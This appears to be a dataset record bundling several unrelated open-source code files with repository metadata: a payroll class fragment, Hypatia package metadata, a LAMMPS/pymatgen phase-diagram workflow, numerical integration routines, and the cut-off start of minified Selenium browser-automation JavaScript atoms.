def getFromDB(self,no=0):
pass
class parousia():
def __init__(self):
self.per = 'Taktikes apodoxes'
self.monadaMetrisis = 'meres'
self.posotis = 25
def calcApodoxes(self,erg):
return 0
def getFromDB(self,no=0):
pass
class erg():
def __init__(self):
self.onoma = 'Ted'
self.eponymo = 'Lazaros'
self.eidikotita = eidikotita('logistis')
def getFromDB(self,no):
self.onoma = 'Popi'
self.eponymo = 'Dazea'
if __name__ == '__main__':
#ted = erg()
#print ted.eidikotita.per
#print ted.eidikotita.calcIKA()
#print ted.eidikotita.ika.calc(1500)
es = Espresso()
es = Mocha(es)
es = Mocha(es)
print es.getDesc()
print es.cost()
|
tedlaz/pyted
|
misthodosia/pyMisthodosia/src/erg.py
|
Python
|
gpl-3.0
| 2,076
|
[
"ESPResSo"
] |
1d822a6c2beef658339243be56182c55b779c73c3b382aca11960616ff7375eb
|
"""This module contains all of the important meta-information for
Hypatia such as the author's name, the copyright and license, status,
and so on.
"""
__author__ = "Lillian Lemmer"
__copyright__ = "Copyright 2015 Lillian Lemmer"
__credits__ = ["Lillian Lemmer"]
__license__ = "MIT"
__maintainer__ = __author__
__site__ = "http://lillian-lemmer.github.io/hypatia/"
__email__ = "lillian.lynn.lemmer@gmail.com"
__status__ = "Development"
__contributors__ = [
"Lillian Lemmer",
"Brian Houston Morrow",
"Eric James Michael Ritz"
]
__version__ = '0.2.26'
|
Applemann/hypatia
|
hypatia/__init__.py
|
Python
|
mit
| 632
|
[
"Brian"
] |
33128007ba8dbc98a7ab5c7d72f56ed5746c1566b74eb388cc319140776c3272
|
# coding: utf-8
# Copyright (c) Henniggroup.
# Distributed under the terms of the MIT License.
from __future__ import division, print_function, unicode_literals, \
absolute_import
"""
Sample LAMMPS workflow that runs MD calculations for a bunch of structures and
subsequently generate their phasediagram.
"""
from math import ceil
import matplotlib
matplotlib.use('Agg')
from pymatgen.core.composition import Composition
from pymatgen.phasediagram.entries import PDEntry
from pymatgen.phasediagram.pdmaker import PhaseDiagram
from pymatgen.phasediagram.plotter import PDPlotter
from mpinterfaces import get_struct_from_mp
from mpinterfaces.lammps import CalibrateLammps
from mpinterfaces.utils import *
# all the info/warnings/outputs redirected to the log file:
# lammps_Al_O.log
logger = get_logger('lammps_Al_O')
# list of structures from materialsproject
structures = get_struct_from_mp('Al-O', all_structs=True)
# scale the structures
scell_size = 12
for s in structures:
a, b, c = s.lattice.abc
s.make_supercell([ceil(scell_size / a),
ceil(scell_size / b),
ceil(scell_size / c)])
# lammps input paramaters
parameters = {'atom_style': 'charge',
'charges': {'Al': 0, 'O': 0},
'minimize': '1.0e-13 1.0e-20 1000 10000',
'fix': ['fix_nve all nve',
'1 all box/relax aniso 0.0 vmax 0.001',
'1a all qeq/comb 1 0.0001 file fq.out']}
# list of pair styles
pair_styles = ['comb3 polar_off']
# list of pair coefficient files
# this file must be in the folder where this script is run
pair_coeff_files = [os.path.join(os.getcwd(), "ffield.comb3")]
def step1(**kwargs):
"""
setup and run all lammps jobs
"""
turn_knobs = OrderedDict(
[
('STRUCTURES', structures),
('PAIR_STYLE', pair_styles),
('PAIR_COEFF', pair_coeff_files)
])
# job directory and run settings
job_dir = 'lammps_job'
nprocs = 4
nnodes = 1
walltime = '00:15:00'
mem = 200
job_bin = '/home/km468/Software/lammps/src/lmp_ufhpc < inp'
qadapter, job_cmd = get_run_cmmnd(nnodes=nnodes, nprocs=nprocs,
walltime=walltime,
job_bin=job_bin, mem=mem)
checkpoint_files = []
chkpt_file = 'step1.json'
# setup calibration jobs and run
cal = CalibrateLammps(parameters, turn_knobs=turn_knobs,
qadapter=qadapter, job_cmd=job_cmd,
job_dir=job_dir, is_matrix=True,
checkpoint_file=chkpt_file,
cal_logger=logger)
cal.setup()
cal.run()
checkpoint_files.append(chkpt_file)
return checkpoint_files
def step2(**kwargs):
"""
post process:
get energies from the jobs in the previous step and
generate the phase diagram
"""
chkfile = kwargs['checkpoint_files'][0]
all_jobs = jobs_from_file(chkfile)
entries = []
# add endpoint data
Al = Composition("Al1O0")
energy_al = -3.36
O = Composition("Al0O1")
energy_o = -2.58
entries.append(PDEntry(Al, energy_al))
entries.append(PDEntry(O, energy_o))
# get data and create entries
for job in all_jobs:
comp = job.vis.mplmp.structure.composition
energy = job.final_energy
entries.append(PDEntry(comp, energy))
pd = PhaseDiagram(entries)
plotter = PDPlotter(pd, show_unstable=True)
plotter.write_image('Al_O_phasediagram.jpg')
return None
if __name__ == '__main__':
steps = [step1, step2]
interval = 60
launch_daemon(steps, interval, ld_logger=logger)
|
henniggroup/MPInterfaces
|
examples/workflows/lammps_workflow.py
|
Python
|
mit
| 3,731
|
[
"LAMMPS",
"pymatgen"
] |
a9f716812857ff5eb3fdd5cd3db10f0d1094adc546626e2e0c6f9afef402ae50
|
"""
Computing integrals.
"""
# TODO:
# FIX GAUSSIAN QUADRATURE
# Include error estimates for each method?
import math
import souffle.utils as utl
import souffle.datatypes as dtt
def trapezoidal(f, a, b, n):
"""
Evaluates the integral of f, with endpoints a and b, using the trapezoidal
rule with n sample points.
@type f: function
@param f: function integrate
@type a: number
@param a: start of interval
@type b: number
@param b: end of interval
@type n: number
@param n: number of sample points
@rtype: number
@return: integral of f between a and b
"""
a = float(a)
b = float(b)
n = int(n)
h = abs(b - a) / n
s = 0.5 * f(a) + 0.5 * f(b)
for k in range(1, n):
s += f(a + k * h)
I = h * s
return I
def simpsons(f, a, b, n):
"""
Evaluates the integral of f, with endpoints a and b, using Simpson's rule
with n sample points.
@type f: function
@param f: function integrate
@type a: number
@param a: start of interval
@type b: number
@param b: end of interval
@type n: number
@param n: number of sample points
@rtype: number
@return: integral of f between a and b
"""
a = float(a)
b = float(b)
n = int(n)
h = (b - a) / n
s = f(a) + f(b)
for k in range(1, n):
# if k is odd
if k % 2:
s += 4.0 * f(a + k * h)
# if k is even
else:
s += 2.0 * f(a + k * h)
I = 1.0 / 3 * h * s
return I
# TODO
def adaptive_simpsons():
return
def boole(f, a, b):
"""
Evaluates the integral of f, with endpoints a and b, using Boole's rule.
@type f: function
@param f: function integrate
@type a: number
@param a: start of interval
@type b: number
@param b: end of interval
@rtype: number
@return: integral of f between a and b
"""
x1 = float(a)
x5 = float(b)
h = (x5 - x1) / 4
x2 = x1 + h
x3 = x1 + 2*h
x4 = x1 + 3*h
return 2*h / 45 * (7*f(x1) + 32*f(x2) + 12*f(x3) + 32*f(x4) + 7 * f(x5))
# TODO
def romberg():
return
# TODO
def cubic():
return
# TODO
def quartic():
return
# TODO
def multiple():
return
|
pauljxtan/mathsci
|
souffle/math/integral.py
|
Python
|
mit
| 2,255
|
[
"Gaussian"
] |
c0e74aed549e1c78120bbbb69550fb67ec23ac5a1f511f549d6f90db772d3987
|
__all__ = ["GET_FIRST_CLIENT_RECT", \
"GET_LOCATION_IN_VIEW", \
"GET_PAGE_ZOOM", \
"IS_ELEMENT_CLICKABLE", \
"TOUCH_SINGLE_TAP", \
"CLEAR", \
"CLEAR_LOCAL_STORAGE", \
"CLEAR_SESSION_STORAGE", \
"CLICK", \
"EXECUTE_ASYNC_SCRIPT", \
"EXECUTE_SCRIPT", \
"EXECUTE_SQL", \
"FIND_ELEMENT", \
"FIND_ELEMENTS", \
"GET_APPCACHE_STATUS", \
"GET_ATTRIBUTE", \
"GET_EFFECTIVE_STYLE", \
"GET_IN_VIEW_LOCATION", \
"GET_LOCAL_STORAGE_ITEM", \
"GET_LOCAL_STORAGE_KEY", \
"GET_LOCAL_STORAGE_KEYS", \
"GET_LOCAL_STORAGE_SIZE", \
"GET_SESSION_STORAGE_ITEM", \
"GET_SESSION_STORAGE_KEY", \
"GET_SESSION_STORAGE_KEYS", \
"GET_SESSION_STORAGE_SIZE", \
"GET_LOCATION", \
"GET_SIZE", \
"GET_TEXT", \
"IS_DISPLAYED", \
"IS_ENABLED", \
"IS_ONLINE", \
"IS_SELECTED", \
"REMOVE_LOCAL_STORAGE_ITEM", \
"REMOVE_SESSION_STORAGE_ITEM", \
"SET_LOCAL_STORAGE_ITEM", \
"SET_SESSION_STORAGE_ITEM", \
"SUBMIT"]
GET_FIRST_CLIENT_RECT = \
"function(){return function(){var g=this;\nfunction h(a){var b=typeof a;"\
"if(\"object\"==b)if(a){if(a instanceof Array)return\"array\";if(a insta"\
"nceof Object)return b;var e=Object.prototype.toString.call(a);if(\"[obj"\
"ect Window]\"==e)return\"object\";if(\"[object Array]\"==e||\"number\"="\
"=typeof a.length&&\"undefined\"!=typeof a.splice&&\"undefined\"!=typeof"\
" a.propertyIsEnumerable&&!a.propertyIsEnumerable(\"splice\"))return\"ar"\
"ray\";if(\"[object Function]\"==e||\"undefined\"!=typeof a.call&&\"unde"\
"fined\"!=typeof a.propertyIsEnumerable&&!a.propertyIsEnumerable(\"call"\
"\"))return\"function\"}else return\"null\";else if(\"function\"==\nb&&"\
"\"undefined\"==typeof a.call)return\"object\";return b};var k;function "\
"l(a,b){this.x=void 0!==a?a:0;this.y=void 0!==b?b:0}l.prototype.toString"\
"=function(){return\"(\"+this.x+\", \"+this.y+\")\"};function m(a){retur"\
"n 9==a.nodeType?a:a.ownerDocument||a.document}function n(a){this.b=a||g"\
".document||document}function p(a){var b=a.b;a=b.body;b=b.parentWindow||"\
"b.defaultView;return new l(b.pageXOffset||a.scrollLeft,b.pageYOffset||a"\
".scrollTop)};function q(a,b,e,d){this.left=a;this.top=b;this.width=e;th"\
"is.height=d}q.prototype.toString=function(){return\"(\"+this.left+\", "\
"\"+this.top+\" - \"+this.width+\"w x \"+this.height+\"h)\"};function s("\
"a){var b;a:{b=m(a);if(b.defaultView&&b.defaultView.getComputedStyle&&(b"\
"=b.defaultView.getComputedStyle(a,null))){b=b.position||b.getPropertyVa"\
"lue(\"position\")||\"\";break a}b=\"\"}return b||(a.currentStyle?a.curr"\
"entStyle.position:null)||a.style&&a.style.position}function t(a){var b;"\
"try{b=a.getBoundingClientRect()}catch(e){return{left:0,top:0,right:0,bo"\
"ttom:0}}return b}\nfunction u(a){var b=m(a),e=s(a),d=\"fixed\"==e||\"ab"\
"solute\"==e;for(a=a.parentNode;a&&a!=b;a=a.parentNode)if(e=s(a),d=d&&\""\
"static\"==e&&a!=b.documentElement&&a!=b.body,!d&&(a.scrollWidth>a.clien"\
"tWidth||a.scrollHeight>a.clientHeight||\"fixed\"==e||\"absolute\"==e||"\
"\"relative\"==e))return a;return null};function v(a){var b=a.getClientR"\
"ects();if(0==b.length)throw Error(\"Element does not have any client re"\
"cts\");b=b[0];if(1==a.nodeType)if(a.getBoundingClientRect)a=t(a),a=new "\
"l(a.left,a.top);else{var e=p(a?new n(m(a)):k||(k=new n));var d=m(a),z=s"\
"(a),c=new l(0,0),r=(d?m(d):document).documentElement;if(a!=r)if(a.getBo"\
"undingClientRect)a=t(a),d=p(d?new n(m(d)):k||(k=new n)),c.x=a.left+d.x,"\
"c.y=a.top+d.y;else if(d.getBoxObjectFor)a=d.getBoxObjectFor(a),d=d.getB"\
"oxObjectFor(r),c.x=a.screenX-d.screenX,c.y=a.screenY-\nd.screenY;else{v"\
"ar f=a;do{c.x+=f.offsetLeft;c.y+=f.offsetTop;f!=a&&(c.x+=f.clientLeft||"\
"0,c.y+=f.clientTop||0);if(\"fixed\"==s(f)){c.x+=d.body.scrollLeft;c.y+="\
"d.body.scrollTop;break}f=f.offsetParent}while(f&&f!=a);\"absolute\"==z&"\
"&(c.y-=d.body.offsetTop);for(f=a;(f=u(f))&&f!=d.body&&f!=r;)c.x-=f.scro"\
"llLeft,c.y-=f.scrollTop}a=new l(c.x-e.x,c.y-e.y)}else e=\"function\"==h"\
"(a.a),c=a,a.targetTouches?c=a.targetTouches[0]:e&&a.a().targetTouches&&"\
"(c=a.a().targetTouches[0]),a=new l(c.clientX,c.clientY);return new q(b."\
"left-\na.x,b.top-a.y,b.right-b.left,b.bottom-b.top)}var w=[\"_\"],x=g;w"\
"[0]in x||!x.execScript||x.execScript(\"var \"+w[0]);for(var y;w.length&"\
"&(y=w.shift());)w.length||void 0===v?x=x[y]?x[y]:x[y]={}:x[y]=v;; retur"\
"n this._.apply(null,arguments);}.apply({navigator:typeof window!=undefi"\
"ned?window.navigator:null,document:typeof window!=undefined?window.docu"\
"ment:null}, arguments);}"
GET_LOCATION_IN_VIEW = \
"function(){return function(){var k=this;\nfunction l(a){var b=typeof a;"\
"if(\"object\"==b)if(a){if(a instanceof Array)return\"array\";if(a insta"\
"nceof Object)return b;var c=Object.prototype.toString.call(a);if(\"[obj"\
"ect Window]\"==c)return\"object\";if(\"[object Array]\"==c||\"number\"="\
"=typeof a.length&&\"undefined\"!=typeof a.splice&&\"undefined\"!=typeof"\
" a.propertyIsEnumerable&&!a.propertyIsEnumerable(\"splice\"))return\"ar"\
"ray\";if(\"[object Function]\"==c||\"undefined\"!=typeof a.call&&\"unde"\
"fined\"!=typeof a.propertyIsEnumerable&&!a.propertyIsEnumerable(\"call"\
"\"))return\"function\"}else return\"null\";else if(\"function\"==\nb&&"\
"\"undefined\"==typeof a.call)return\"object\";return b};var m;function "\
"n(a,b){this.x=void 0!==a?a:0;this.y=void 0!==b?b:0}n.prototype.toString"\
"=function(){return\"(\"+this.x+\", \"+this.y+\")\"};function p(a,b){thi"\
"s.width=a;this.height=b}p.prototype.toString=function(){return\"(\"+thi"\
"s.width+\" x \"+this.height+\")\"};function q(a){return a?new r(s(a)):m"\
"||(m=new r)}function s(a){return 9==a.nodeType?a:a.ownerDocument||a.doc"\
"ument}function r(a){this.a=a||k.document||document}function t(a){a=(a.a"\
".parentWindow||a.a.defaultView||window).document;a=\"CSS1Compat\"==a.co"\
"mpatMode?a.documentElement:a.body;return new p(a.clientWidth,a.clientHe"\
"ight)}function u(a){var b=a.a;a=b.body;b=b.parentWindow||b.defaultView;"\
"return new n(b.pageXOffset||a.scrollLeft,b.pageYOffset||a.scrollTop)};f"\
"unction v(a,b,c,d){this.top=a;this.right=b;this.bottom=c;this.left=d}v."\
"prototype.toString=function(){return\"(\"+this.top+\"t, \"+this.right+"\
"\"r, \"+this.bottom+\"b, \"+this.left+\"l)\"};function w(a,b,c,d){this."\
"left=a;this.top=b;this.width=c;this.height=d}w.prototype.toString=funct"\
"ion(){return\"(\"+this.left+\", \"+this.top+\" - \"+this.width+\"w x \""\
"+this.height+\"h)\"};function x(a,b){var c=s(a);return c.defaultView&&c"\
".defaultView.getComputedStyle&&(c=c.defaultView.getComputedStyle(a,null"\
"))?c[b]||c.getPropertyValue(b)||\"\":\"\"}function y(a){return x(a,\"po"\
"sition\")||(a.currentStyle?a.currentStyle.position:null)||a.style&&a.st"\
"yle.position}function z(a){var b;try{b=a.getBoundingClientRect()}catch("\
"c){return{left:0,top:0,right:0,bottom:0}}return b}\nfunction A(a){var b"\
"=s(a),c=y(a),d=\"fixed\"==c||\"absolute\"==c;for(a=a.parentNode;a&&a!=b"\
";a=a.parentNode)if(c=y(a),d=d&&\"static\"==c&&a!=b.documentElement&&a!="\
"b.body,!d&&(a.scrollWidth>a.clientWidth||a.scrollHeight>a.clientHeight|"\
"|\"fixed\"==c||\"absolute\"==c||\"relative\"==c))return a;return null}"\
"\nfunction B(a){var b=s(a),c=y(a),d=new n(0,0),f=(b?s(b):document).docu"\
"mentElement;if(a==f)return d;if(a.getBoundingClientRect)a=z(a),b=u(q(b)"\
"),d.x=a.left+b.x,d.y=a.top+b.y;else if(b.getBoxObjectFor)a=b.getBoxObje"\
"ctFor(a),b=b.getBoxObjectFor(f),d.x=a.screenX-b.screenX,d.y=a.screenY-b"\
".screenY;else{var e=a;do{d.x+=e.offsetLeft;d.y+=e.offsetTop;e!=a&&(d.x+"\
"=e.clientLeft||0,d.y+=e.clientTop||0);if(\"fixed\"==y(e)){d.x+=b.body.s"\
"crollLeft;d.y+=b.body.scrollTop;break}e=e.offsetParent}while(e&&e!=a);"\
"\"absolute\"==\nc&&(d.y-=b.body.offsetTop);for(e=a;(e=A(e))&&e!=b.body&"\
"&e!=f;)d.x-=e.scrollLeft,d.y-=e.scrollTop}return d}function C(a){if(1=="\
"a.nodeType){if(a.getBoundingClientRect)a=z(a),a=new n(a.left,a.top);els"\
"e{var b=u(q(a));a=B(a);a=new n(a.x-b.x,a.y-b.y)}return a}var b=\"functi"\
"on\"==l(a.b),c=a;a.targetTouches?c=a.targetTouches[0]:b&&a.b().targetTo"\
"uches&&(c=a.b().targetTouches[0]);return new n(c.clientX,c.clientY)};fu"\
"nction D(a,b){var c;c=B(b);var d=B(a);c=new n(c.x-d.x,c.y-d.y);var f,e,"\
"h;h=x(a,\"borderLeftWidth\");e=x(a,\"borderRightWidth\");f=x(a,\"border"\
"TopWidth\");d=x(a,\"borderBottomWidth\");d=new v(parseFloat(f),parseFlo"\
"at(e),parseFloat(d),parseFloat(h));c.x-=d.left;c.y-=d.top;return c}\nfu"\
"nction E(a,b,c){function d(a,b,c,d,e){d=new w(c.x+d.left,c.y+d.top,d.wi"\
"dth,d.height);c=[0,0];b=[b.width,b.height];var f=[d.left,d.top];d=[d.wi"\
"dth,d.height];for(var g=0;2>g;g++)if(d[g]>b[g])c[g]=e?f[g]+d[g]/2-b[g]/"\
"2:f[g];else{var h=f[g]-b[g]+d[g];0<h?c[g]=h:0>f[g]&&(c[g]=f[g])}e=new n"\
"(c[0],c[1]);a.scrollLeft+=e.x;a.scrollTop+=e.y}for(var f=s(a),e=a.paren"\
"tNode,h;e&&e!=f.documentElement&&e!=f.body;)h=D(e,a),d(e,new p(e.client"\
"Width,e.clientHeight),h,b,c),e=e.parentNode;h=C(a);a=t(q(a));d(f.body,a"\
",h,\nb,c)};function F(a,b,c){c||(c=new w(0,0,a.offsetWidth,a.offsetHeig"\
"ht));E(a,c,b);a=C(a);return new n(a.x+c.left,a.y+c.top)}var G=[\"_\"],H"\
"=k;G[0]in H||!H.execScript||H.execScript(\"var \"+G[0]);for(var I;G.len"\
"gth&&(I=G.shift());)G.length||void 0===F?H=H[I]?H[I]:H[I]={}:H[I]=F;; r"\
"eturn this._.apply(null,arguments);}.apply({navigator:typeof window!=un"\
"defined?window.navigator:null,document:typeof window!=undefined?window."\
"document:null}, arguments);}"
GET_PAGE_ZOOM = \
"function(){return function(){function a(b){b=9==b.nodeType?b:b.ownerDoc"\
"ument||b.document;var c=b.documentElement,c=Math.max(c.clientWidth,c.of"\
"fsetWidth,c.scrollWidth);return b.width/c}var d=[\"_\"],e=this;d[0]in e"\
"||!e.execScript||e.execScript(\"var \"+d[0]);for(var f;d.length&&(f=d.s"\
"hift());)d.length||void 0===a?e=e[f]?e[f]:e[f]={}:e[f]=a;; return this."\
"_.apply(null,arguments);}.apply({navigator:typeof window!=undefined?win"\
"dow.navigator:null,document:typeof window!=undefined?window.document:nu"\
"ll}, arguments);}"
IS_ELEMENT_CLICKABLE = \
"function(){return function(){function c(h,d){function g(a,b){var d={cli"\
"ckable:a};b&&(d.message=b);return d}var a=h.ownerDocument.elementFromPo"\
"int(d.x,d.y);if(a==h)return g(!0);var l=\"(\"+d.x+\", \"+d.y+\")\";if(n"\
"ull==a)return g(!1,\"Element is not clickable at point \"+l);var b=a.ou"\
"terHTML;if(a.hasChildNodes())var m=a.innerHTML,n=b.length-m.length-(\"<"\
"/\"+a.tagName+\">\").length,b=b.substring(0,n)+\"...\"+b.substring(n+m."\
"length);for(a=a.parentNode;a;){if(a==h)return g(!0,\"Element's descenda"\
"nt would receive the click. Consider clicking the descendant instead. D"\
"escendant: \"+\nb);a=a.parentNode}return g(!1,\"Element is not clickabl"\
"e at point \"+l+\". Other element would receive the click: \"+b)}var e="\
"[\"_\"],f=this;e[0]in f||!f.execScript||f.execScript(\"var \"+e[0]);for"\
"(var k;e.length&&(k=e.shift());)e.length||void 0===c?f=f[k]?f[k]:f[k]={"\
"}:f[k]=c;; return this._.apply(null,arguments);}.apply({navigator:typeo"\
"f window!=undefined?window.navigator:null,document:typeof window!=undef"\
"ined?window.document:null}, arguments);}"
TOUCH_SINGLE_TAP = \
"function(){return function(){function aa(a){return function(){return th"\
"is[a]}}function ba(a){return function(){return a}}var g,k=this;\nfuncti"\
"on ca(a){var b=typeof a;if(\"object\"==b)if(a){if(a instanceof Array)re"\
"turn\"array\";if(a instanceof Object)return b;var c=Object.prototype.to"\
"String.call(a);if(\"[object Window]\"==c)return\"object\";if(\"[object "\
"Array]\"==c||\"number\"==typeof a.length&&\"undefined\"!=typeof a.splic"\
"e&&\"undefined\"!=typeof a.propertyIsEnumerable&&!a.propertyIsEnumerabl"\
"e(\"splice\"))return\"array\";if(\"[object Function]\"==c||\"undefined"\
"\"!=typeof a.call&&\"undefined\"!=typeof a.propertyIsEnumerable&&!a.pro"\
"pertyIsEnumerable(\"call\"))return\"function\"}else return\"null\";\nel"\
"se if(\"function\"==b&&\"undefined\"==typeof a.call)return\"object\";re"\
"turn b}function l(a){return void 0!==a}function m(a){return\"string\"=="\
"typeof a}function da(a){return\"number\"==typeof a}function p(a){return"\
"\"function\"==ca(a)}function r(a,b){function c(){}c.prototype=b.prototy"\
"pe;a.ha=b.prototype;a.prototype=new c};var ea=window;function fa(a){ret"\
"urn String(a).replace(/\\-([a-z])/g,function(a,c){return c.toUpperCase("\
")})};var ga=Array.prototype;function s(a,b){for(var c=a.length,d=m(a)?a"\
".split(\"\"):a,e=0;e<c;e++)e in d&&b.call(void 0,d[e],e,a)}function ha("\
"a,b){for(var c=a.length,d=Array(c),e=m(a)?a.split(\"\"):a,f=0;f<c;f++)f"\
" in e&&(d[f]=b.call(void 0,e[f],f,a));return d}function ia(a,b){if(a.re"\
"duce)return a.reduce(b,\"\");var c=\"\";s(a,function(d,e){c=b.call(void"\
" 0,c,d,e,a)});return c}function ja(a,b){for(var c=a.length,d=m(a)?a.spl"\
"it(\"\"):a,e=0;e<c;e++)if(e in d&&b.call(void 0,d[e],e,a))return!0;retu"\
"rn!1}\nfunction ka(a,b){var c;a:if(m(a))c=m(b)&&1==b.length?a.indexOf(b"\
",0):-1;else{for(c=0;c<a.length;c++)if(c in a&&a[c]===b)break a;c=-1}ret"\
"urn 0<=c}function la(a,b,c){return 2>=arguments.length?ga.slice.call(a,"\
"b):ga.slice.call(a,b,c)};var ma={aliceblue:\"#f0f8ff\",antiquewhite:\"#"\
"faebd7\",aqua:\"#00ffff\",aquamarine:\"#7fffd4\",azure:\"#f0ffff\",beig"\
"e:\"#f5f5dc\",bisque:\"#ffe4c4\",black:\"#000000\",blanchedalmond:\"#ff"\
"ebcd\",blue:\"#0000ff\",blueviolet:\"#8a2be2\",brown:\"#a52a2a\",burlyw"\
"ood:\"#deb887\",cadetblue:\"#5f9ea0\",chartreuse:\"#7fff00\",chocolate:"\
"\"#d2691e\",coral:\"#ff7f50\",cornflowerblue:\"#6495ed\",cornsilk:\"#ff"\
"f8dc\",crimson:\"#dc143c\",cyan:\"#00ffff\",darkblue:\"#00008b\",darkcy"\
"an:\"#008b8b\",darkgoldenrod:\"#b8860b\",darkgray:\"#a9a9a9\",darkgreen"\
":\"#006400\",\ndarkgrey:\"#a9a9a9\",darkkhaki:\"#bdb76b\",darkmagenta:"\
"\"#8b008b\",darkolivegreen:\"#556b2f\",darkorange:\"#ff8c00\",darkorchi"\
"d:\"#9932cc\",darkred:\"#8b0000\",darksalmon:\"#e9967a\",darkseagreen:"\
"\"#8fbc8f\",darkslateblue:\"#483d8b\",darkslategray:\"#2f4f4f\",darksla"\
"tegrey:\"#2f4f4f\",darkturquoise:\"#00ced1\",darkviolet:\"#9400d3\",dee"\
"ppink:\"#ff1493\",deepskyblue:\"#00bfff\",dimgray:\"#696969\",dimgrey:"\
"\"#696969\",dodgerblue:\"#1e90ff\",firebrick:\"#b22222\",floralwhite:\""\
"#fffaf0\",forestgreen:\"#228b22\",fuchsia:\"#ff00ff\",gainsboro:\"#dcdc"\
"dc\",\nghostwhite:\"#f8f8ff\",gold:\"#ffd700\",goldenrod:\"#daa520\",gr"\
"ay:\"#808080\",green:\"#008000\",greenyellow:\"#adff2f\",grey:\"#808080"\
"\",honeydew:\"#f0fff0\",hotpink:\"#ff69b4\",indianred:\"#cd5c5c\",indig"\
"o:\"#4b0082\",ivory:\"#fffff0\",khaki:\"#f0e68c\",lavender:\"#e6e6fa\","\
"lavenderblush:\"#fff0f5\",lawngreen:\"#7cfc00\",lemonchiffon:\"#fffacd"\
"\",lightblue:\"#add8e6\",lightcoral:\"#f08080\",lightcyan:\"#e0ffff\",l"\
"ightgoldenrodyellow:\"#fafad2\",lightgray:\"#d3d3d3\",lightgreen:\"#90e"\
"e90\",lightgrey:\"#d3d3d3\",lightpink:\"#ffb6c1\",lightsalmon:\"#ffa07a"\
"\",\nlightseagreen:\"#20b2aa\",lightskyblue:\"#87cefa\",lightslategray:"\
"\"#778899\",lightslategrey:\"#778899\",lightsteelblue:\"#b0c4de\",light"\
"yellow:\"#ffffe0\",lime:\"#00ff00\",limegreen:\"#32cd32\",linen:\"#faf0"\
"e6\",magenta:\"#ff00ff\",maroon:\"#800000\",mediumaquamarine:\"#66cdaa"\
"\",mediumblue:\"#0000cd\",mediumorchid:\"#ba55d3\",mediumpurple:\"#9370"\
"db\",mediumseagreen:\"#3cb371\",mediumslateblue:\"#7b68ee\",mediumsprin"\
"ggreen:\"#00fa9a\",mediumturquoise:\"#48d1cc\",mediumvioletred:\"#c7158"\
"5\",midnightblue:\"#191970\",mintcream:\"#f5fffa\",mistyrose:\"#ffe4e1"\
"\",\nmoccasin:\"#ffe4b5\",navajowhite:\"#ffdead\",navy:\"#000080\",oldl"\
"ace:\"#fdf5e6\",olive:\"#808000\",olivedrab:\"#6b8e23\",orange:\"#ffa50"\
"0\",orangered:\"#ff4500\",orchid:\"#da70d6\",palegoldenrod:\"#eee8aa\","\
"palegreen:\"#98fb98\",paleturquoise:\"#afeeee\",palevioletred:\"#db7093"\
"\",papayawhip:\"#ffefd5\",peachpuff:\"#ffdab9\",peru:\"#cd853f\",pink:"\
"\"#ffc0cb\",plum:\"#dda0dd\",powderblue:\"#b0e0e6\",purple:\"#800080\","\
"red:\"#ff0000\",rosybrown:\"#bc8f8f\",royalblue:\"#4169e1\",saddlebrown"\
":\"#8b4513\",salmon:\"#fa8072\",sandybrown:\"#f4a460\",seagreen:\"#2e8b"\
"57\",\nseashell:\"#fff5ee\",sienna:\"#a0522d\",silver:\"#c0c0c0\",skybl"\
"ue:\"#87ceeb\",slateblue:\"#6a5acd\",slategray:\"#708090\",slategrey:\""\
"#708090\",snow:\"#fffafa\",springgreen:\"#00ff7f\",steelblue:\"#4682b4"\
"\",tan:\"#d2b48c\",teal:\"#008080\",thistle:\"#d8bfd8\",tomato:\"#ff634"\
"7\",turquoise:\"#40e0d0\",violet:\"#ee82ee\",wheat:\"#f5deb3\",white:\""\
"#ffffff\",whitesmoke:\"#f5f5f5\",yellow:\"#ffff00\",yellowgreen:\"#9acd"\
"32\"};var na=\"background-color border-top-color border-right-color bor"\
"der-bottom-color border-left-color color outline-color\".split(\" \"),o"\
"a=/#([0-9a-fA-F])([0-9a-fA-F])([0-9a-fA-F])/;function pa(a){if(!qa.test"\
"(a))throw Error(\"'\"+a+\"' is not a valid hex color\");4==a.length&&(a"\
"=a.replace(oa,\"#$1$1$2$2$3$3\"));return a.toLowerCase()}var qa=/^#(?:["\
"0-9a-f]{3}){1,2}$/i,ra=/^(?:rgba)?\\((\\d{1,3}),\\s?(\\d{1,3}),\\s?(\\d"\
"{1,3}),\\s?(0|1|0\\.\\d*)\\)$/i;\nfunction sa(a){var b=a.match(ra);if(b"\
"){a=Number(b[1]);var c=Number(b[2]),d=Number(b[3]),b=Number(b[4]);if(0<"\
"=a&&255>=a&&0<=c&&255>=c&&0<=d&&255>=d&&0<=b&&1>=b)return[a,c,d,b]}retu"\
"rn[]}var ta=/^(?:rgb)?\\((0|[1-9]\\d{0,2}),\\s?(0|[1-9]\\d{0,2}),\\s?(0"\
"|[1-9]\\d{0,2})\\)$/i;function ua(a){var b=a.match(ta);if(b){a=Number(b"\
"[1]);var c=Number(b[2]),b=Number(b[3]);if(0<=a&&255>=a&&0<=c&&255>=c&&0"\
"<=b&&255>=b)return[a,c,b]}return[]};function t(a,b){this.code=a;this.st"\
"ate=va[a]||xa;this.message=b||\"\";var c=this.state.replace(/((?:^|\\s+"\
")[a-z])/g,function(a){return a.toUpperCase().replace(/^[\\s\\xa0]+/g,\""\
"\")}),d=c.length-5;if(0>d||c.indexOf(\"Error\",d)!=d)c+=\"Error\";this."\
"name=c;c=Error(this.message);c.name=this.name;this.stack=c.stack||\"\"}"\
"r(t,Error);\nvar xa=\"unknown error\",va={15:\"element not selectable\""\
",11:\"element not visible\",31:\"ime engine activation failed\",30:\"im"\
"e not available\",24:\"invalid cookie domain\",29:\"invalid element coo"\
"rdinates\",12:\"invalid element state\",32:\"invalid selector\",51:\"in"\
"valid selector\",52:\"invalid selector\",17:\"javascript error\",405:\""\
"unsupported operation\",34:\"move target out of bounds\",27:\"no such a"\
"lert\",7:\"no such element\",8:\"no such frame\",23:\"no such window\","\
"28:\"script timeout\",33:\"session not created\",10:\"stale element ref"\
"erence\",\n0:\"success\",21:\"timeout\",25:\"unable to set cookie\",26:"\
"\"unexpected alert open\"};va[13]=xa;va[9]=\"unknown command\";t.protot"\
"ype.toString=function(){return this.name+\": \"+this.message};var ya,za"\
",Aa,Ba=k.navigator;Aa=Ba&&Ba.platform||\"\";ya=-1!=Aa.indexOf(\"Mac\");"\
"za=-1!=Aa.indexOf(\"Win\");var u=-1!=Aa.indexOf(\"Linux\");var Ca;funct"\
"ion v(a,b){this.x=l(a)?a:0;this.y=l(b)?b:0}g=v.prototype;g.toString=fun"\
"ction(){return\"(\"+this.x+\", \"+this.y+\")\"};g.ceil=function(){this."\
